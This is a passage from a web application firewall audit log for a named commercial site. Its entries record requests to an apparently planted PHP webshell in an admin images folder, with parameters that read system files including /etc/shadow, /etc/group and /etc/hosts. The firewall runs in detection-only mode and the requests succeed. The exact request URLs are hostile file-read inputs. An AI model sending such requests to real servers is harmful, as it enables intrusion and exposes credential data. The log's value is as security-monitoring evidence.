HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --7d699d6d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3219 Connection: close Content-Type: text/html; charset=UTF-8 --7d699d6d-H-- Message: Warning. Matched phrase "etc/alias" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/alias found within ARGS:viewfile: /etc/aliases.db"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/alias" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/alias found within ARGS:viewfile: /etc/aliases.db"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6BMLIQi_ruyWEJ7bFHuQAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975344664869 4202 (- - -) Stopwatch2: 1749975344664869 4202; combined=2088, p1=328, p2=1635, p3=36, p4=36, p5=53, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7d699d6d-Z-- --b5c2e234-A-- [15/Jun/2025:13:46:22.342285 +0530] aE6BVsZRGs9Zs5Qd_koKVAAAAAA 216.73.216.83 40896 127.0.0.1 7081 --b5c2e234-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Ftimezone HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b5c2e234-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2944 Connection: close Content-Type: text/html; charset=UTF-8 --b5c2e234-H-- Message: Warning. Matched phrase "etc/timezone" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/timezone found within ARGS:viewfile: /etc/timezone"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/timezone" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/timezone found within ARGS:viewfile: /etc/timezone"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6BVsZRGs9Zs5Qd_koKVAAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975382337861 4479 (- - -) Stopwatch2: 1749975382337861 4479; combined=2056, p1=317, p2=1596, p3=39, p4=37, p5=66, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b5c2e234-Z-- --2965c905-A-- [15/Jun/2025:13:46:22.978392 +0530] aE6BVsZRGs9Zs5Qd_koKVQAAAAA 216.73.216.83 40980 127.0.0.1 7081 --2965c905-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fissue HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --2965c905-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --2965c905-H-- Message: Warning. Matched phrase "etc/issue" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/issue found within ARGS:viewfile: /etc/issue"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/issue" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/issue found within ARGS:viewfile: /etc/issue"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6BVsZRGs9Zs5Qd_koKVQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975382974267 4189 (- - -) Stopwatch2: 1749975382974267 4189; combined=2243, p1=338, p2=1776, p3=38, p4=34, p5=57, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2965c905-Z-- --41983f37-A-- [15/Jun/2025:13:46:23.796479 +0530] aE6BV7p3Rl2d9qI7hkJmdQAAAAM 216.73.216.83 41078 127.0.0.1 7081 --41983f37-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fhostname HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --41983f37-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2961 Connection: close Content-Type: text/html; charset=UTF-8 --41983f37-H-- Message: Warning. Matched phrase "etc/hostname" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/hostname found within ARGS:viewfile: /etc/hostname"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/hostname" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/hostname found within ARGS:viewfile: /etc/hostname"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6BV7p3Rl2d9qI7hkJmdQAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975383792538 4005 (- - -) Stopwatch2: 1749975383792538 4005; combined=1904, p1=319, p2=1441, p3=33, p4=33, p5=78, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --41983f37-Z-- --1e256674-A-- [15/Jun/2025:13:47:00.757247 +0530] aE6BfE0nW1houYLyuKrJVAAAAA0 216.73.216.83 59856 127.0.0.1 7081 --1e256674-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fgroup- HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --1e256674-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3565 Connection: close Content-Type: text/html; charset=UTF-8 --1e256674-H-- Message: Warning. Matched phrase "etc/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/group found within ARGS:viewfile: /etc/group-"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/group found within ARGS:viewfile: /etc/group-"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6BfE0nW1houYLyuKrJVAAAAA0"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975420753289 4021 (- - -) Stopwatch2: 1749975420753289 4021; combined=1983, p1=345, p2=1509, p3=33, p4=33, p5=63, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1e256674-Z-- --e6b0cd70-A-- [15/Jun/2025:13:47:01.121081 +0530] aE6BffVbLd3MzwkmrE-JwwAAAAg 216.73.216.83 59892 127.0.0.1 7081 --e6b0cd70-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fhosts.allow HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --e6b0cd70-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3168 Connection: close Content-Type: text/html; charset=UTF-8 --e6b0cd70-H-- Message: Warning. Matched phrase "etc/hosts" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/hosts found within ARGS:viewfile: /etc/hosts.allow"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/hosts" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/hosts found within ARGS:viewfile: /etc/hosts.allow"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6BffVbLd3MzwkmrE-JwwAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975421117235 3900 (- - -) Stopwatch2: 1749975421117235 3900; combined=2045, p1=344, p2=1563, p3=38, p4=43, p5=56, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e6b0cd70-Z-- --1e2e2e0c-A-- [15/Jun/2025:13:47:01.213295 +0530] aE6BfbQynla1sJRjEuHAaQAAAAQ 216.73.216.83 59904 127.0.0.1 7081 --1e2e2e0c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fgroup HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --1e2e2e0c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3574 Connection: close Content-Type: text/html; charset=UTF-8 --1e2e2e0c-H-- Message: Warning. Matched phrase "etc/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/group found within ARGS:viewfile: /etc/group"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/group found within ARGS:viewfile: /etc/group"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6BfbQynla1sJRjEuHAaQAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975421209244 4114 (- - -) Stopwatch2: 1749975421209244 4114; combined=2077, p1=350, p2=1600, p3=36, p4=35, p5=56, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1e2e2e0c-Z-- --7f8b1c4b-A-- [15/Jun/2025:13:47:51.901929 +0530] aE6Br7IQi_ruyWEJ7bFIDAAAAAk 216.73.216.83 38672 127.0.0.1 7081 --7f8b1c4b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fftpchroot HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --7f8b1c4b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2940 Connection: close Content-Type: text/html; charset=UTF-8 --7f8b1c4b-H-- Message: Warning. Matched phrase "etc/ftpchroot" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ftpchroot found within ARGS:viewfile: /etc/ftpchroot"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ftpchroot" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ftpchroot found within ARGS:viewfile: /etc/ftpchroot"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6Br7IQi_ruyWEJ7bFIDAAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975471897939 4044 (- - -) Stopwatch2: 1749975471897939 4044; combined=1952, p1=328, p2=1503, p3=33, p4=33, p5=55, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7f8b1c4b-Z-- --7807df24-A-- [15/Jun/2025:13:47:52.052421 +0530] aE6BsE0nW1houYLyuKrJcgAAAA0 216.73.216.83 38688 127.0.0.1 7081 --7807df24-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Ffstab HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --7807df24-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3008 Connection: close Content-Type: text/html; charset=UTF-8 --7807df24-H-- Message: Warning. Matched phrase "etc/fstab" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/fstab found within ARGS:viewfile: /etc/fstab"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/fstab" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/fstab found within ARGS:viewfile: /etc/fstab"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6BsE0nW1houYLyuKrJcgAAAA0"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975472048350 4170 (- - -) Stopwatch2: 1749975472048350 4170; combined=2040, p1=329, p2=1487, p3=34, p4=133, p5=57, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7807df24-Z-- --467baa4b-A-- [15/Jun/2025:13:49:02.387711 +0530] aE6B9k0nW1houYLyuKrJjgAAAA0 216.73.216.83 55338 127.0.0.1 7081 --467baa4b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc%2Fld.so.conf.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --467baa4b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3216 Connection: close Content-Type: text/html; charset=UTF-8 --467baa4b-H-- Message: Warning. Matched phrase "etc/ld.so.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:path: /etc/ld.so.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ld.so.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:path: /etc/ld.so.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6B9k0nW1houYLyuKrJjgAAAA0"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975542383638 4126 (- - -) Stopwatch2: 1749975542383638 4126; combined=2132, p1=326, p2=1678, p3=47, p4=27, p5=54, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --467baa4b-Z-- --4ab3373d-A-- [15/Jun/2025:13:49:02.390027 +0530] aE6B9raxs8_oWLL8MgpMBQAAAAY 216.73.216.83 55352 127.0.0.1 7081 --4ab3373d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc&viewfile=%2F%2Fproc%2Fdevices HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --4ab3373d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3257 Connection: close Content-Type: text/html; charset=UTF-8 --4ab3373d-H-- Message: Warning. Matched phrase "proc/devices" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/devices found within ARGS:viewfile: /proc/devices"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/devices" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/devices found within ARGS:viewfile: /proc/devices"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6B9raxs8_oWLL8MgpMBQAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975542386389 3700 (- - -) Stopwatch2: 1749975542386389 3700; combined=1741, p1=286, p2=1353, p3=28, p4=27, p5=47, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4ab3373d-Z-- --bce5e818-A-- [15/Jun/2025:13:49:03.356195 +0530] aE6B9_VbLd3MzwkmrE-J_gAAAAg 216.73.216.83 55454 127.0.0.1 7081 --bce5e818-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fshadow- HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --bce5e818-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2930 Connection: close Content-Type: text/html; charset=UTF-8 --bce5e818-H-- Message: Warning. Matched phrase "etc/shadow" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/shadow found within ARGS:viewfile: /etc/shadow-"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/shadow" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/shadow found within ARGS:viewfile: /etc/shadow-"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6B9_VbLd3MzwkmrE-J_gAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975543351839 4412 (- - -) Stopwatch2: 1749975543351839 4412; combined=2336, p1=389, p2=1786, p3=36, p4=37, p5=88, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bce5e818-Z-- --f863210c-A-- [15/Jun/2025:13:50:11.212161 +0530] aE6CO7p3Rl2d9qI7hkJm6AAAAAM 216.73.216.83 33744 127.0.0.1 7081 --f863210c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fshadow HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --f863210c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2929 Connection: close Content-Type: text/html; charset=UTF-8 --f863210c-H-- Message: Warning. Matched phrase "etc/shadow" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/shadow found within ARGS:viewfile: /etc/shadow"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/shadow" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/shadow found within ARGS:viewfile: /etc/shadow"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6CO7p3Rl2d9qI7hkJm6AAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975611207992 4223 (- - -) Stopwatch2: 1749975611207992 4223; combined=2269, p1=349, p2=1790, p3=38, p4=36, p5=56, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f863210c-Z-- --0054832a-A-- [15/Jun/2025:13:50:11.666463 +0530] aE6CO315LOn2YRwTZIj3uQAAAAc 216.73.216.83 33794 127.0.0.1 7081 --0054832a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fhosts HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0054832a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3106 Connection: close Content-Type: text/html; charset=UTF-8 --0054832a-H-- Message: Warning. Matched phrase "etc/hosts" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/hosts found within ARGS:viewfile: /etc/hosts"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/hosts" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/hosts found within ARGS:viewfile: /etc/hosts"] [severity "CRITICAL"] [tag "CWAF"] 